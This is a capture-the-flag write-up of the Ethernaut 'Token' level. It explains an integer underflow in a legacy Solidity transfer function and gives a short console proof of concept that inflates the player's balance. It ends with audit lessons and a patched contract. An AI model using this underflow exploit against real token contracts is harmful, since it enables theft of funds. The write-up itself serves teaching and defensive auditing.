🪙 Token - The Underflow Glitch

Challenge Overview

In this level, we are given a basic token contract and start with a balance of 20 tokens. Our goal is to acquire a large number of additional tokens.

The Catch: We only have 20 tokens, and we cannot mint or purchase more through standard avenues.

Technical Analysis

Vulnerability: Arithmetic Underflow in Legacy Solidity

The Token contract is compiled with Solidity ^0.6.0 and implements a standard token transfer:

1
function transfer(address _to, uint256 _value) public returns (bool) {
2
    require(balances[msg.sender] - _value >= 0);
3
    balances[msg.sender] -= _value;
4
    balances[_to] += _value;
5
    return true;
6
}

The Root Cause

Two critical flaws are present here:

Solidity version < 0.8.0: Prior to version 0.8.0, arithmetic operations in Solidity did not revert on overflow or underflow. Instead, they wrapped around.
Unsigned Integer Wrapping: balances[msg.sender] - _value uses uint256. Unsigned integers cannot represent negative numbers. If we attempt to subtract a value larger than our current balance (e.g., 20 - 21), the result underflows and wraps around to $2^{256} - 1$ .

Because the expression underflows:

The check balances[msg.sender] - _value >= 0 always evaluates to true (since any uint256 value, including the wrapped underflow, is always $\ge 0$ ).
balances[msg.sender] -= _value underflows our balance to an astronomical value near $2^{256}$ .

The Exploit: The Multi-Step Solution

Identify a Target: Select any address other than ours (e.g., the contract’s address or a random address).
Perform the Underflow Transfer: Call transfer(target, 21) from our account (which has 20 tokens).
Inspect the Wealth: The subtraction 20 - 21 underflows, and our balance becomes $2^{256} - 1$ .

Proof of Concept (PoC)

Below is the JavaScript console commands to execute in the Ethernaut console:

1
// Transfer 21 tokens to a dummy address (more than our current 20)
2
const dummyAddress = "0x0000000000000000000000000000000000000000";
3
await contract.transfer(dummyAddress, 21);
4

5
// Verify our new astronomical balance
6
const newBalance = await contract.balanceOf(player);
7
console.log("Player's balance:", newBalance.toString());

Auditor’s Lessons

Upgrade Your Compiler: Always use modern Solidity versions (>= 0.8.0) where arithmetic overflows and underflows revert automatically by default.
Use SafeMath for Legacy Code: If you must audit or maintain legacy contracts (compiled with < 0.8.0), ensure all mathematical operations are processed using OpenZeppelin’s SafeMath library.
Flawed Assertions: Avoid checking if an unsigned integer is greater than or equal to 0 (e.g., uint >= 0), as this statement is tautological and always returns true.

Remediation

The simplest and most secure fix is upgrading to Solidity 0.8.0 or higher, which handles checks natively:

1
// SPDX-License-Identifier: MIT
2
pragma solidity ^0.8.0;
3

4
contract SecureToken {
5
    mapping(address => uint256) public balances;
6
    uint256 public totalSupply;
7

8
    constructor(uint256 _initialSupply) {
9
        balances[msg.sender] = totalSupply = _initialSupply;
10
    }
11

12
    function transfer(address _to, uint256 _value) public returns (bool) {
13
        // Underflow will automatically revert here in solidity >= 0.8.0
14
        require(balances[msg.sender] >= _value, "Insufficient balance");
15
        balances[msg.sender] -= _value;
16
        balances[_to] += _value;
17
        return true;
18
    }
19

20
    function balanceOf(address _owner) public view returns (uint256 balance) {
21
        return balances[_owner];
22
    }
23
}

Ethernaut - Token